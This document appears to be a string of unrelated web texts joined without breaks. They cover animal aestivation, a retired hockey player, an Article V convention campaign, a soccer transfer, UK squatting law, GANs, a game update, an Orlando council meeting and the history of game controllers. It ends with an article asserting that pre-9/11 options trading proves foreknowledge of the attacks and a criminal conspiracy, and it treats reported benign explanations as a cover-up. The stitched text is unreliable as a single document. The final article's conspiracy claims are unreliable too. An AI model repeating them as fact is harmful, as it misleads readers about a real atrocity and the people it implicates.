Non-mammalian animals that aestivate include North American desert tortoises , crocodiles , and salamanders . Some amphibians ( e.g . the cane toad and greater siren ) aestivate during the hot dry season by moving underground where it is cooler and more humid . The California red-legged frog may aestivate to conserve energy when its food and water supply is low . [ 11 ]
The water-holding frog has an aestivation cycle . It buries itself in sandy ground in a secreted , water-tight mucus cocoon during periods of hot , dry weather . Australian Aborigines discovered a means to take advantage of this by digging up one of these frogs and squeezing it , causing the frog to empty its bladder . This dilute urine—up to half a glassful—can be drunk . However , this will cause the death of the frog which will be unable to survive until the next rainy season without the water it had stored . [ 12 ]
The western swamp turtle aestivates to survive hot summers in the ephemeral swamps it lives in . It buries itself in various media which change depending on location and available substrates . [ 13 ] Because the species is critically endangered , the Perth Zoo began a conservation and breeding program for it . However , zookeepers were unaware of the importance of their aestivation cycle and during the first summer period would perform weekly checks on the animals . This repeated disturbance was detrimental to the health of the animals , with many losing significant weight and some dying . The zookeepers quickly changed their procedures and now leave their captive turtles undisturbed during their aestivation period .
Fish [ edit ]
African lungfish also aestivate . [ 14 ] [ 15 ]
Mammals [ edit ]
Although relatively uncommon , a small number of mammals aestivate . [ 16 ] Animal physiologist Kathrin Dausmann of Philipps University of Marburg , Germany , and coworkers presented evidence in a 2004 edition of Nature that the Malagasy fat-tailed dwarf lemur hibernates or aestivates in a small tree hole for seven months of the year . [ 17 ] According to the Oakland Zoo in California , East African hedgehogs are thought to aestivate during the dry season . [ 18 ]
See also [ edit ]
References [ edit ]
Kimmo Timonen was drafted by the Los Angeles Kings , developed into an all-star with the Nashville Predators and won the Stanley Cup last season with the Chicago Blackhawks .
But he still considers himself a member of the Philadelphia Flyers .
`` I was in Nashville for eight years and I was the captain there , '' Timonen said . `` My kids were born in Nashville . So those memories are really nice . Here in Philly , I think my role was so good , and playing for the Flyers in front of these fans , it was something I 'll remember for the rest of my life . … I think the Flyers are my No . 1 team . ''
Timonen , 40 , will be honored by the Flyers on Wednesday prior to the game against the Blackhawks ( 8 p.m . ET ; NBCSN ) .
`` I 'll be emotional , probably , '' Timonen said . `` I was able to see [ the Blackhawks ' ] season opener and banner-raising ceremony . It was something cool to see . I knew it was going to be the last time I 'm going to see them probably . I had a good time there . But Wednesday is going to be another thing I 'm going to really enjoy . I 'm really honored to be there . I get to bring my parents to the game . So I 'm looking forward to it . ''
Timonen 's acquisition from the Predators on June 18 , 2007 was a big reason the Flyers went from 30th in the NHL in 2006-07 to the 2008 Eastern Conference Final . In eight seasons with Philadelphia he had 270 points , third all-time among Flyers defensemen . He did not play for the Flyers last season after being diagnosed in August with blood clots in his lungs and lower right leg . When he was cleared to play , the Flyers traded him to the Blackhawks on Feb. 27 .
He also helped the Flyers reach the 2010 Stanley Cup Final .
`` When we went to the Stanley Cup Final , I think Kimmo was playing his best hockey that I saw , '' said Flyers captain Claude Giroux . `` He was game in and game out so consistent . I remember … him playing very well every game . ''
Giroux was one of a number of young players who used Timonen as a role model . Though Timonen never served as captain with the Flyers , his words carried heft inside and outside the locker room .
`` He was n't always barking out orders , he was n't always the most talkative guy , '' Flyers forward Wayne Simmonds said . `` But when he said something it really resonated with most of the guys because Kimmo went out there and put his body on the line at every single point of the game . He was probably the best offensive defenseman and defensive defensemen at the same time . We learned a lot from Kimmo when he was playing with us .
`` He had perfect timing . … When I got here I was sitting , listening to the things Kimmo had to say and the moment he had to say them . It was refreshing to see that type of leader . ''
Timonen could continue helping players as he transitions to life after hockey . He announced his retirement after the Blackhawks defeated the Tampa Bay Lightning in Game 6 of the Cup Final .
He said he 's talked to Flyers general manager Ron Hextall about a job , but said his first priority is spending time with his wife and children on their schedule , rather than the one he was on as a player . At some point though , he said coaching is something that appeals to him .
`` The perfect situation would be some kind of coach , '' Timonen said . `` I like to teach people . I like to talk to players , I like to give my opinion of what I see on the ice , what they can do better . At the same time , that kind of road , that 's a big commitment . Once you want to be some kind of coach with the team , that 's a 24/7 job . I 'm not really ready to do that . But that would be the perfect job for me , to help the [ defensemen ] and just give them my opinion about the game , what I think they can do better , that kind of stuff . But that might be way down the road when the kids are out of the home and that kind of stuff .
`` In the near future , hockey has been my life , so I understand what hockey is and what is a good team and what is a good player . If it 's scouting or some kind of management job , I know my stuff ; I know that . But at the same time I have n't really thought about what the role might be . I would like to help the Flyers down the road . When that is , I do n't quite know yet . ''
-- -
One of the greatest protections that the Framers of the U.S. Constitution wove into our nation 's governing document is the power of checks and balances . They divided our government into three branches – Legislative , Executive and Judiciary – and gave each branch the ability to check the other two in order to prevent any branch from becoming too powerful . Another unique tool they provided us was the ability to amend our Constitution as needs arose over time in order to allow it to govern our nation properly and to protect our rights in the future . There have been 27 amendments to our Constitution , the first ten ( The Bill of Rights ) were proposed at the same time and ratified in 1791 . All 27 amendments have been proposed by Congress .
But there is another method of amending that the Framers provided us in order to allow We The People a check against out of control , runaway federal government through our state legislatures .
The text of Article V below describes both of these methods :
The Congress , whenever two thirds of both houses shall deem it necessary , shall propose amendments to this Constitution , or , on the application of the legislatures of two thirds of the several states , shall call a convention for proposing amendments , which , in either case , shall be valid to all intents and purposes , also as part of this Constitution , when ratified by the legislatures of three fourths of the several states , or by conventions in three fourths thereof , as the one or the other mode of ratification may be proposed by the Congress ; provided that no amendment which may be made prior to the year one thousand eight hundred and eight shall in any manner affect the first and fourth clauses in the ninth section of the first article ; and that no state , without its consent , shall be deprived of its equal suffrage in the Senate .
Originally when Article V was drafted it only gave Congress the authority to propose amendments . On September 15th1787 , as the Constitutional Convention was coming to a close , James Madison in his notes states that Colonel George Mason “ thought the plan of amending the Constitution exceptional and dangerous . As the proposing of amendments is in both modes to depend , in the first , in the second , ultimately , on Congress , no amendments of the proper kind would ever be obtained by the people , if the Government should become oppressive , as he very believed would be the case. ” In response , Gouverneur Morris and Elbridge Gerry made a motion to amend the article to reintroduce language requiring that a convention be called when two-thirds of the states applied for an amendment . Thankfully this correction gave the states equal authority with Congress to propose needed amendments . This ultimate check of the states against a runaway Congress was a very strong argument in favor of ratification to assuage the fears of New Yorkers used by by Alexander Hamilton 's closing remarks in Federalist # 85 :
It is this that the national rulers , whenever nine States concur , will have no option upon the subject . By the fifth article of the plan , the Congress will be obliged “ on the application of the legislatures of two thirds of the States [ which at present amount to nine ] , to call a convention for proposing amendments , which shall be valid , to all intents and purposes , as part of the Constitution , when ratified by the legislatures of three fourths of the States , or by conventions in three fourths thereof. ” The words of this article are peremptory . The Congress “ shall call a convention. ” Nothing in this particular is left to the discretion of that body . And of consequence , all the declamation about the disinclination to a change vanishes in air . Nor however difficult it may be supposed to unite two thirds or three fourths of the State legislatures , in amendments which may affect local interests , can there be any room to apprehend any such difficulty in a union on points which are merely relative to the general liberty or security of the people . We may safely rely on the disposition of the State legislatures to erect barriers against the encroachments of the national authority .
Unfortunately the fears of the Framers that the government they created would one day become tyrannical have become reality for us today . The abuses of Congress – from out of control spending and debt , overbearing regulations , attacks against state sovereignty and radical judicial activism – have become the norm today , and it is time for the states to defend our freedoms by exercising their Constitutional authority as found in Article V .
The Convention of States Project is working with volunteers throughout the country to help empower state legislators to apply for an Article V Convention to propose amendments that impose fiscal restraints on the federal government , limit the power and jurisdiction of the federal government , and limit the terms of office for its officials and members of Congress . As Coalitions Director for the Convention of States Project I urge you to join us in this fight to save our nation and to encourage your state representative and senator to support our Article V application . The time to stand up against a runaway federal government has arrived but we need your help .
Cahill sensationally walked from Melbourne City and , most likely , the A-League on Wednesday after agreeing terms to rip up his contract with the expansion side .
The 38-year-old has yet to announce his next destination , saying he would focus on preparing for a fourth World Cup next June 's tournament in Russia .
It 's there that he will aim to underscore his place in the sport by joining Pele as one of just four players to have scored at four tournaments .
With so much on the line , Muscat says the all-time leading Socceroos goalscorer would n't be leaving his future to chance .
`` Knowing Timmy ... he 'll have something lined up , '' Muscat said .
Cahill and Muscat have been teammates for both club and country .
As Victory boss , Muscat has spent the past 16 months trying to negate Cahill 's influence at City .
They could yet find themselves in Russia together , should Muscat get the nod to take over from his mentor Ange Postecoglou as Socceroos coach .
Muscat was n't keen on looking too far ahead on Thursday , instead looking back to Cahill 's time in the A-League .
His first act in Australian club football was to score one of the greatest goals in A-League history - against Victory .
Lawrence Thomas was left with no chance as Cahill rocketed a 40-metre half volley into the net in his first A-League derby .
Muscat might have resented that performance but said he was eager to see where Cahill ended up - for the good of the Socceroos .
`` His first season , that wow factor of Timmy coming back , certainly helped promote the competition , '' he said .
`` It served it 's purpose from that perspective .
`` But it 's obviously a personal situation that I 'm very far from .
`` Whatever he decides , we wish him well and hopefully he gets what he desires to make sure he 's available for that World Cup . ''
LONDON , Aug. 31 ( UPI ) -- Britain 's housing minister said he expects `` quick and decisive action '' when a new law cracking down on squatters takes effect this weekend .
The legislation -- set to go into effect Saturday -- redefines squatters as criminals in England and Wales . The law allows police to evict those occupying buildings without the owner 's permission , The Guardian reported .
Housing Minister Grant Schapp told The Daily Telegraph he was `` amazed '' squatting was not already a crime and that homeowners with squatters on their property faced weeks of court hearings before they could reclaim their homes .
Schapp said rather than homeowners going through the ordeal of court hearings , evicting squatters under the new law should take nothing more than a call to the police , who he expects to respond `` promptly . ''
`` Hardworking homeowners need and deserve a justice system where their rights come first -- this new offense will ensure the police and other agencies can take quick and decisive action to deal with the misery of squatting . ''
Squatters face as much as six months in prison and fines of as much as 5,000 pounds ( almost $ 8,000 ) .
Advocacy groups say the law will increase the number of people living on the streets . They estimate as many as 20,000 people live in housing where they are not legal tenants .
GANs were introduced by Ian Goodfellow in 2014 . They are n't the only approach of neural networks in unsupervised learning . There 's also the Boltzmann machine ( Geoffrey Hinton and Terry Sejnowski , 1985 ) and Autoencoders ( Dana H. Ballard , 1987 ) . Both of them are dedicated to extract features from data by learning the identity function f ( x ) = x and both of them rely on Markov chains to train or to generate samples .
Generative adversarial networks were designed to avoid using Markov chains because of the high computational cost of the latter . Another advantage relative to Boltzmann machines is that the Generator function has much fewer restrictions ( there are only a few probability distributions that admit Markov chain sampling ) .
In this article , we 'll tell you how generative adversarial nets work and what their most popular applications in real life are . We will also give you links to some helpful resources for getting deeper into these approaches .
The engine of generative adversarial nets
To explain GANs ' concept let us use an analogy .
Imagine you want to buy good watches . If you never buy them it 's very likely that you ca n't distinguish brand watches from fake ones . You have to be experienced to not let yourself be fooled by the seller .
As you start to label most of the watches as fake ( after a number of mistakes of course ) , the seller will start to “ generate ” more compelling copies of the watches . This example demonstrates the behavior of generative adversarial networks : Discriminator ( watches buyer ) and Generator ( seller of fake watches ) .
These two networks , Discriminator and Generator , are contesting with each other . This technique allows the generation of realistic objects ( e.g . images ) . The Generator is forced to generate samples that look real and the Discriminator learns to distinguish generated samples and samples from real data .
What 's the difference between discriminative and generative algorithms ? In brief : discriminative algorithms learn the boundaries between classes ( as the Discriminator does ) while generative algorithms learn the distribution of classes ( as the Generator does ) .
If you 're ready to go deeper
To learn the Generator 's distribution , p_g over data x , the distribution on input noise variables p_z ( z ) should be defined . Then G ( z , θ_g ) maps z from latent space Z to data space and D ( x , θ_d ) outputs a single scalar — probability that x came from the real data rather than p_g .
The Discriminator is trained to maximize the probability of assigning the correct label to both examples of real data and generated samples . While the Generator is trained to minimize log ( 1 — D ( G ( z ) ) ) . In other words — to minimize the probability of the Discriminator 's correct answer .
It is possible to consider such a training task as minimax game with value function V ( G , D ) :
In other words — the Generator tries harder to fool the Discriminator and the Discriminator becomes more captious in order to not be fooled by the Generator .
“ Adversarial training is the coolest thing since sliced bread. ” — Yann LeCun
The process of training stops when the Discriminator is unable to distinguish p_g and p_data , i.e . D ( x , θ_d ) = ½ . Equilibrium between errors of the Generator and the Discriminator is established .
Image retrieval for historical archives
An interesting example of GANs applications is retrieving visually similar marks in “ Prize Papers , ” one of the most valuable archives in the field of maritime history . Adversarial nets make it easier to work with documents of historical importance containing information about the legitimacy of ship captures at sea .
Each query contains examples of Merchant Marks — unique identification of property of a merchant , sketch-like symbols that are similar to hieroglyphs .
Feature representation of every mark should be obtained , but there are some problems of applying conventional machine and deep learning methods ( including Convolutional neural networks ) :
they require a large amount of labelled images ;
there are no labels for Merchant Marks ;
marks are not segmented from the dataset .
This new approach shows how to extract and learn features from images of the Merchant Marks using GANs . After the representation of each mark is learned the visual search on scanned documents could be processed .
Text translation into images
Other researchers showed that it 's possible to use descriptive properties of natural language to generate corresponding images . A method of text translation into images allows the illustration of the performance of generative models to mimic samples of real data .
It 's here ! Today 's update includes some big new features for CS : GO including Skill Groups and the long-awaited GOTV . Special thanks to the folks at ESWC for providing great feedback as we developed GOTV .
Our matchmaking system has been fine tuned over the past weeks as we 've gotten data from thousands of Classic Competitive matches . Now that matchmaking is running smoothly it 's time to share our data with you . That 's where Skill Groups come in .
When you have won at least 10 competitive matches , we 'll reveal your Skill Group as an icon that you can see on the main menu . You can see your friends ' Skill Group when you join a party in the Play With Friends menu , and you can see other players ' Skill Groups when you reach the end of a match .
Speaking of the end of a match , we 've made a change to match leaving . If a team loses a player , that team gains a new option : Vote to Concede . If the team does not concede by majority vote , the match continues .
What are you waiting for ? Go ! Go ! Go !
From the home of Disney World comes a city council meeting so magical , so enchanting that it has its own glorious video intro :
“ Ladies and gentlemen , ” boomed the voiceover , “ please welcome our mayor , Buddy Dyer ! ”
The stock footage abruptly faded to the council chambers , where one sole attendee applauded on cue .
“ Whoever had that one clap , I appreciate that , ” the mayor lightheartedly quipped as the room roared with laughter .
“ Welcome to the January 29 , 2016 meeting of the Orlando City Council , ” announced His Honor , his brains apparently scrambled from too many rides on Splash Mountain . “ We give our commissioners the opportunity to update you on items from their commission district . ”
But by the time Commissioner Samuel Ings finished his slideshow of the Sixth Annual Red Tie Celebrity Golf Extravaganza , the mayor had a mea culpa :
“ The city clerk let me know that when I called the meeting to order , I said it was the January…or December ? ”
“ January , ” the clerk corrected–again .
“ Some month other than August , ” Mayor Dyer admitted to chuckles . “ Hopefully most of you are aware that it is August . ”
If you 're having trouble forgiving the mayor for his brain fart , Commissioner Robert Stuart had some words for you .
“ Back in April we were listed as the second or third most compassionate city in the country , ” he said , introducing his resolution to make Orlando an official “ compassionate city ” –which is like a regular city , except Commissioner Stuart will kiss your boo-boo , I guess .
The mayor glanced sideways . “ Amy , our city clerk , was commenting to me that she did n't think she was getting enough TV time . So I thought I would let her read the resolution . ”
Without missing a beat , she retorted , “ You just know I can do it faster than you. ” Ladies and germs , the Mayor and Clerk Variety Hour will be here all night !
But not so fast : on deck was a new fee to expand Orlando 's non-cartoon-themed parks . “ We 're proposing to collect in three zones , ” explained a bespectacled city staffer . “ The funds raised in each of those three zones must be utilized in those three zones . ”
That did n't wash with Commissioner Regina Hill , whose zone had lots of low-income housing that would n't pay .
“ There 's gon na be no monies generated in that area for improvements in my parks ! ” she exclaimed , whipping off her glasses . “ Especially Lake Lorna Doone , which has needed $ 4 million ! ”
The parks director raced to the mic . “ Lake Lorna Doone is in the north zone . So all of the revenues generated in the north zone have to be spent in the north zone– ”
“ But the new residential that will be built…will NOT generate fees , ” fired back Hill exasperatedly .
“ In the north district , I think the ten-year revenue was about $ 6 million , ” the staffer tried to assuage her .
Hill was apoplectic . “ I got ta wait ten years ? ! ”
“ Well…over ten years . Yeah , ” the staffer meekly responded .
At this point , the city attorney stepped into the fracas .
“ The reason Lake Lorna Doone was not included in the definition of a regional park is because of its size , ” he explained .
“ It 's a ‘ regional park ' to those that live in that area ! ” the commissioner mic-dropped .
Final thoughts : Yikes . Looks like a few people did n't get the message that Orlando is a compassionate city now . I give 8 out of 10 stars to Commissioner Hill . Fight on !
The Evolution Of The Video Game Controllers ( Joysticks )
Do you know that how the first video game controller looked ? or how video game controllers aka joysticks looked in early days ?
Do n't miss the complete evolution of video game control schemes-including handhelds , joysticks , paddles , game-pads , and one notable glove–this pictures shows how gaming input has evolved from simple knobs to directional pads to touch screens .
Magnavox Odyssey first demonstrated in April 1972 and released publically in August 1972 . This is the world 's first commercial video game controller .
Image : Wikipedia
Fairchild Channel F is a home video game console released in 1976 by Fairchild Semiconductor . The controller was made available at a retail price of $ 169.95 at that time and is equivalent to $ 700 as per recent days .
Image : Wikipedia
Atari 2600 was released by Atari , Inc in September 1977
Image : Wikipedia
Atari VCS ( 2600 ) paddle controller look very similar to the driving controllers .
Image : Wikipedia
Bally Astrocade ( Released in 1977 and discontinued in 1983 )
Image : Wikipedia
Magnavox Odyssey 2 is released in 1978 and discontinued in 1984
Image : Wikipedia
APF Microcomputer System ( APF-MP1000 ) released in 1978
Image : Imgur
Intellivision by Mattel is released in 1979
Image : Wikipedia
Texas Instruments TI-99/4A is released in 1981 and discontinued in 1983
Image : Classiccmp
ColecoVision by Coleco Industries released in 1982 and discontinued in 1985
Image : Wikipedia
Atari 5200 SuperSystem was introduced in 1982 by Atai Inc and discontinued in 1984
Image : Wikipedia
Vectrex is released in November 1982 at a retail price of $ 199 by General Consumer Electronics .
Image : Wikipedia
Nintendo Entertainment System was developed and manufactured by Nintendo in 1983 in Japan .
Image : Wikipedia
Master System was manufactured by Sega and originally released in 1985 as the Sega Mark III in Japan .
Image : Wikipedia
Atari 7800 or Atari 7800 Pro System was officially released by Atari Corporation in January 1986 in the USA .
Image : Wikipedia
DINA 2-in-One by Bit Corporation which is released as Telegames Personal Arcade in US .
Image : Wikipedia
Action Max was created in 1987 by Worlds of Wonder .
Image : Wikipedia
View-Master Interactive Vision was introduced in 1988 by View-Master Ideal Group , Inc .
Image : Wikipedia
Sega Genesis was developed and sold by Sega Enterprises , Ltd in 1988 in Japan and in 1989 in the USA .
Image : Wikipedia
Sega Genesis model 2 with 6-button controller .
Image : Wikipedia
TurboGrafx-16 was joint-developed by Hudson Soft and NEC , which is released in Japan on October 30 , 1987 , and in the United States on August 29 , 1989 .
Image : Wikipedia
Super Nintendo Entertainment System was developed by Nintendo that was released in 1990 in Japan , 1991 in North America , 1992 in Europe and Australasia ( Oceania ) , and 1993 in South America .
Image : Wikipedia
3DO Interactive Multiplayer is developed by The 3DO Company and released in 1993 in North America .
Image : Wikipedia
Atari Jaguar was released by Atari Corporation in 1993 .
Image : Wikipedia
Sega Pico , also known as Kids Computer Pico is developed by Sega . The Pico was released in 1993 in Japan and 1994 in North America and Europe , and later reached China .
Image : WordPress.com
Virtual Boy , originally known as VR-32 was developed and manufactured by Nintendo . It was released on July 21 , 1995 in Japan and August 14 , 1995 in North America at a price of around US $ 180 .
Image : Wikipedia
R-Zone was developed and manufactured by Tiger Electronics and released in 1995 .
Image : Wikipedia
Sega Saturn was developed by Sega and released on November 22 , 1994 in Japan , May 11 , 1995 in North America and July 8 , 1995 in Europe .
Image : Wikipedia
Sega Saturn model 2 North American controller
Image : Wikipedia
Sega Saturn 3D Pad is a fully functional controller that includes both a control pad and an analog stick for directional input .
Image : Wikipedia
PlayStation is created and developed by Sony Computer Entertainment . The brand was first introduced on December 3 , 1994 in Japan .
Image : Wikipedia
Nintendo 64 was released in June 1996 in Japan , September 1996 in North America , March 1997 in Europe and Australia , September 1997 in France and December 1997 in Brazil .
Image : Wikipedia
Dreamcast was released by Sega on November 27 , 1998 in Japan , September 9 , 1999 in North America , and October 14 , 1999 in Europe .
Image : Wikipedia
PlayStation 2 is Sony 's second installment in the PlayStation Series . It was released on March 4 , 2000 , in Japan followed by North America and Europe later the same year .
Image : Wikipedia
Xbox is a video gaming brand created and owned by Microsoft . The original Xbox was released on November 15 , 2001 in North America , February 22 , 2002 in Japan , and March 14 , 2002 in Australia and Europe .
Image : Wikipedia
Xbox Controller S is a smaller , lighter Xbox controller , was originally the standard Xbox controller only in Japan .
Image : Wikipedia
GameCube was released by Nintendo on September 14 , 2001 in Japan and November 18 , 2001 in North America . It was later released worldwide in 2002 .
Image : Wikipedia
Xbox 360 is developed by Microsoft and was officially unveiled on MTV on May 12 , 2005 .
Image : Wikipedia
Wii is released by Nintendo on November 19 , 2006 .
Image : Wikipedia
Wii Classic Controller Pro is produced by Nintendo for the Wii video game console .
Image : Wikipedia
Wii U Pro Controller is a video game controller produced by Nintendo in 2012 for the Wii U video game console .
Image : Wikipedia
The DualShock 4 controller for PlayStation 4 is developed by Sony Computer Entertainment . This is the successor of DualShock 3 , with several new features . One new feature is a built-in two-point capacitive touch pad on the front of the controller , which can be clicked .
Image : Wikipedia
Xbox One is developed and marketed by Microsoft . Announced on May 21 , 2013 , it is the successor to the Xbox 360 and is the third console in the Xbox family .
Image : Wikipedia
The complete family tree of video game control schemes
Image : Popchartlab
Insider Trading
Pre-9/11 Put Options on Companies Hurt by Attack Indicates Foreknowledge
Financial transactions in the days before the attack suggest that certain individuals used foreknowledge of the attack to reap huge profits . 1 The evidence of insider trading includes :
Huge surges in purchases of put options on stocks of the two airlines used in the attack -- United Airlines and American Airlines
Surges in purchases of put options on stocks of reinsurance companies expected to pay out billions to cover losses from the attack -- Munich Re and the AXA Group
Surges in purchases of put options on stocks of financial services companies hurt by the attack -- Merrill Lynch & Co. , and Morgan Stanley and Bank of America
Huge surge in purchases of call options of stock of a weapons manufacturer expected to gain from the attack -- Raytheon
Huge surges in purchases of 5-Year US Treasury Notes
In each case , the anomalous purchases translated into large profits as soon as the stock market opened a week after the attack : put options were used on stocks that would be hurt by the attack , and call options were used on stocks that would benefit .
Put and call options are contracts that allow their holders to sell and buy assets , respectively , at specified prices by a certain date . Put options allow their holders to profit from declines in stock values because they allow stocks to be bought at market price and sold for the higher option price . The ratio of the volume of put option contracts to call option contracts is called the put/call ratio . The ratio is usually less than one , with a value of around 0.8 considered normal . 2
Losers
American Airlines and United Airlines , and several insurance companies and banks posted huge loses in stock values when the markets opened on September 17 . Put options -- financial instruments which allow investors to profit from the decline in value of stocks -- were purchased on the stocks of these companies in great volume in the week before the attack .
United Airlines and American Airlines
Two of the corporations most damaged by the attack were American Airlines ( AMR ) , the operator of Flight 11 and Flight 77 , and United Airlines ( UAL ) , the operator of Flight 175 and Flight 93 . According to CBS News , in the week before the attack , the put/call ratio for American Airlines was four . 3 The put/call ratio for United Airlines was 25 times above normal on September 6 . 4
This graph shows a dramatic spike in pre-attack purchases of put options on the airlines used in the attack . ( source : www.optionsclearing.com )
The spikes in put options occurred on days that were uneventful for the airlines and their stock prices .
5 On Sept. 6-7 , when there was no significant news or stock price movement involving United , the Chicago exchange handled 4,744 put options for UAL stock , compared with just 396 call options -- essentially bets that the price will rise . On Sept. 10 , an uneventful day for American , the volume was 748 calls and 4,516 puts , based on a check of option trading records .
The Bloomberg News reported that put options on the airlines surged to the phenomenal high of 285 times their average .
6 Over three days before terrorists flattened the World Trade Center and damaged the Pentagon , there was more than 25 times the previous daily average trading in a Morgan Stanley `` put '' option that makes money when shares fall below $ 45 . Trading in similar AMR and UAL put options , which make money when their stocks fall below $ 30 apiece , surged to as much as 285 times the average trading up to that time .
When the market reopened after the attack , United Airlines stock fell 42 percent from $ 30.82 to $ 17.50 per share , and American Airlines stock fell 39 percent , from $ 29.70 to $ 18.00 per share . 7
Reinsurance Companies
Several companies in the reinsurance business were expected to suffer huge losses from the attack : Munich Re of Germany and Swiss Re of Switzerland -- the world 's two biggest reinsurers , and the AXA Group of France . In September , 2001 , the San Francisco Chronicle estimated liabilities of $ 1.5 billion for Munich Re and $ 0.55 bilion for the AXA Group and telegraph.co.uk estimated liabilities of £1.2 billion for Munich Re and £0.83 billion for Swiss Re . 8 9
Trading in shares of Munich Re was almost double its normal level on September 6 , and 7 , and trading in shares of Swiss Re was more than double its normal level on September 7 . 10
Financial Services Companies
Merrill Lynch and Morgan Stanley Dean Witter & Co. and Merrill Lynch & Co. were both headquartered in lower Manhattan at the time of the attack . Morgan Stanley occupied 22 floors of the North Tower and Merrill Lynch had headquarters near the Twin Towers . Morgan Stanley , which saw an average of 27 put options on its stock bought per day before September 6 , saw 2,157 put options bought in the three trading days before the attack . Merrill Lynch , which saw an average of 252 put options on its stock bought per day before September 5 , saw 12,215 put options bought in the four trading days before the attack . Morgan Stanley 's stock dropped 13 % and Merrill Lynch 's stock dropped 11.5 % when the market reopened . 11
Bank of America showed a fivefold increase in put option trading on the Thursday and Friday before the attack .
12 A Bank of America option that would profit if the No . 3 U.S. bank 's stock fell below $ 60 a share had more than 5,900 contracts traded on the Thursday and Friday before the Sept. 11 assaults , almost five times the previous average trading , according to Bloomberg data . The bank 's shares fell 11.5 percent to $ 51 in the first week after trading resumed on Sept. 17 .
Winners
While most companies would see their stock valuations decline in the wake of the attack , those in the business of supplying the military would see dramatic increases , reflecting the new business they were poised to receive .
Raytheon
Raytheon , maker of Patriot and Tomahawk missiles , saw its stock soar immediately after the attack . Purchases of call options on Raytheon stock increased sixfold on the day before the attack .
13 A Raytheon option that makes money if shares are more than $ 25 each had 232 options contracts traded on the day before the attacks , almost six times the total number of trades that had occurred before that day . A contract represents options on 100 shares . Raytheon shares soared almost 37 percent to $ 34.04 during the first week of post-attack U.S. trading .
Raytheon has been fined millions of dollars inflating the costs of equipment it sells the US military . Raytheon has a secretive subsidiary , E-Systems , whose clients have included the CIA and NSA . 14
US Treasury Notes
Five-year US Treasury notes were purchased in abnormally high volumes before the attack , and their buyers were rewarded with sharp increases in their value following the attack .
15 The Wall Street Journal reported on October 2 that the ongoing investigation by the SEC into suspicious stock trades had been joined by a Secret Service probe into an unusually high volume of five-year US Treasury note purchases prior to the attacks . The Treasury note transactions included a single $ 5 billion trade . As the Journal explained : `` Five-year Treasury notes are among the best investments in the event of a world crisis , especially one that hits the US . The notes are prized for their safety and their backing by the US government , and usually rally when investors flee riskier investments , such as stocks . '' The value of these notes , the Journal pointed out , has risen sharply since the events of September 11 .
The SEC 's Investigation
Shortly after the attack the SEC circulated a list of stocks to securities firms around the world seeking information . 16 A widely circulated article states that the stocks flagged by the SEC included those of the following corporations : American Airlines , United Airlines , Continental Airlines , Northwest Airlines , Southwest Airlines , US Airways airlines , Martin , Boeing , Lockheed Martin Corp. , AIG , American Express Corp , American International Group , AMR Corporation , AXA SA , Bank of America Corp , Bank of New York Corp , Bank One Corp , Cigna Group , CNA Financial , Carnival Corp , Chubb Group , John Hancock Financial Services , Hercules Inc. , L-3 Communications Holdings , Inc. , LTV Corporation , Marsh & McLennan Cos. Inc. , MetLife , Progressive Corp. , General Motors , Raytheon , W.R. Grace , Royal Caribbean Cruises , Ltd. , Lone Star Technologies , American Express , the Citigroup Inc. , Royal & Sun Alliance , Lehman Brothers Holdings , Inc. , Vornado Reality Trust , Morgan Stanley , Dean Witter & Co. , XL Capital Ltd. , and Bear Stearns .
An October 19 article in the San Francisco Chronicle reported that the SEC , after a period of silence , had undertaken the unprecedented action of deputizing hundreds of private officials in its investigation :
...
In a two-page statement issued to `` all securities-related entities '' nationwide , the SEC asked companies to designate senior personnel who appreciate `` the sensitive nature '' of the case and can be relied upon to `` exercise appropriate discretion '' as `` point '' people linking government investigators and the industry . 17 The proposed system , which would go into effect immediately , effectively deputizes hundreds , if not thousands , of key players in the private sector .... In a two-page statement issued to `` all securities-related entities '' nationwide , the SEC asked companies to designate senior personnel who appreciate `` the sensitive nature '' of the case and can be relied upon to `` exercise appropriate discretion '' as `` point '' people linking government investigators and the industry .
Michael Ruppert , a former LAPD officer , explains the consequences of this action :
18 What happens when you deputize someone in a national security or criminal investigation is that you make it illegal for them to disclose publicly what they know . Smart move . In effect , they become government agents and are controlled by government regulations rather than their own conscience . In fact , they can be thrown in jail without a hearing if they talk publicly . I have seen this implied threat time and again with federal investigations , intelligence agents , and even members of the United States Congress who are bound so tightly by secrecy oaths and agreements that they are not even able to disclose criminal activities inside the government for fear of incarceration .
Interpreting and Reinterpreting the Data
An analysis of the press reports on the subject of apparent insider trading related to the attack shows a trend , with early reports highlighting the anomalies , and later reports excusing them . In his book Crossing the Rubicon Michael C. Ruppert illustrates this point by first excerpting a number of reports published shortly after the attack :
A jump in UAL ( United Airlines ) put options 90 times ( not 90 percent ) above normal between September 6 and September 10 , and 285 times higher than average on the Thursday before the attack .
-- CBS News , September 26
-- CBS News , September 26 A jump in American Airlines put options 60 times ( not 60 percent ) above normal on the day before the attacks .
-- CBS News , September 26
-- CBS News , September 26 No similar trading occurred on any other airlines
-- Bloomberg Business Report , the Institute for Counterterrorism ( ICT ) , Herzliyya , Israel [ citing data from the CBOE ] 3
-- Bloomberg Business Report , the Institute for Counterterrorism ( ICT ) , Herzliyya , Israel [ citing data from the CBOE ] Morgan Stanley saw , between September 7 and September 10 , an increase of 27 times ( not 27 percent ) in the purchase of put options on its shares . 4
Merrill-Lynch saw a jump of more than 12 times the normal level of put options in the four trading days before the attacks . 5 [ Excerpted ENDNOTES ]
3 . `` Mechanics of Possible Bin Laden Insider Trading Scam , '' Herzlyya International Policy Institute for Counterterrorism ( ICT ) , September 22 , 2001 . Michael C. Ruppert , `` The Case for Bush Administration Advance Knowledge of 9-11 Attacks , '' From the Wilderness April 22 , 2002 . Posted at Centre for Research and Globalization < www.globalresearch.ca/articles/RUP203A.html > . 4 . ICT , op . cit , citing data from the Chicago Board of Options Exchange ( CBOE ) . [ ... ] `` Terrorists trained at CBPE . '' Chicago Sun-Times , September 20 , 2001 , < www.suntimes.com/terror/stories/cst-nws-trade20.html > . `` Probe of options trading link to attacks confirmed , '' [ ... ] Chicago Sun-Times , September 21 , 2001 , < www.suntimes.com/terror/stories/cst-fin-trade21.html > . 5 . ICT , op . cit . 19 [ Excerpted ENDNOTES ]
Ruppert then illustrates an apparent attempt to bury the story by explaining it away as nothing unusual . A September 30 New York Times article claims that `` benign explanations are turning up '' in the SEC 's investigation . 20 The article blames the activity in put options , which it does n't quantify , on `` market pessimism , '' but fails to explain why the price of the stocks in the airlines does n't reflect the same market pessimism .
The fact that $ 2.5 million of the put options remained unclaimed is not explained at all by market pessimism , and is evidence that the put option purchasers were part of a criminal conspiracy . 21
References
